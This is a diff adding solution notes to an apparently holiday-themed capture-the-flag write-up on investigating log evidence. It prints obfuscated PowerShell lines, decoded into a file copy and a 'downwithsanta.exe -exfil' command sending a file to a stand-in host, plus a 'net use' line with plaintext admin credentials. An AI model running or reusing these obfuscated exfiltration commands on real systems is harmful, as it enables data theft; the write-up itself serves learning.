--- a/docs/objectives/o13.md
+++ b/docs/objectives/o13.md
@@ -48,12 +48,34 @@ Once you've got the intel we need, report back and we'll plan our next move. Sta
 
 ## Solution
 
+    Notes: Case 4 time stamp for the command to list network shares was actually not correct. The challenge accepted the timestamp of the net /share command rather than net use.
+    
+    Powershell code found:
+    
+    Invoke-WmiMethod -ComputerName $Server -Class CCM_SoftwareUpdatesManager -Name InstallUpdates - ArgumentList (, $PendingUpdateList) -Namespace root[&ccm&]clientsdk | Out-Null
+
+
+
+cmd.exe /C net use \\NorthPolefileshare\c$ /user:admin AdminPass123
+
+
+( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''
+
+translates to: powershell -c Copy-Item \\NorthPoleFiles\c\MissionCritical\NiceList.txt C:\Desktop\NiceList.txt
+
+
+
+[StRiNg]::JoIn( '', [ChaR[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))|& ((gv '*MDr*').NamE[3,11,2]-joiN
+
+converted to text:
+downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file
+    
 ...
 
 
 ### Images
 
-![...](...)
+![MS Copilot help](../img/objectives/o13/decoded_from_ms_copilot.PNG)
 
 
 !!! success "Answer"
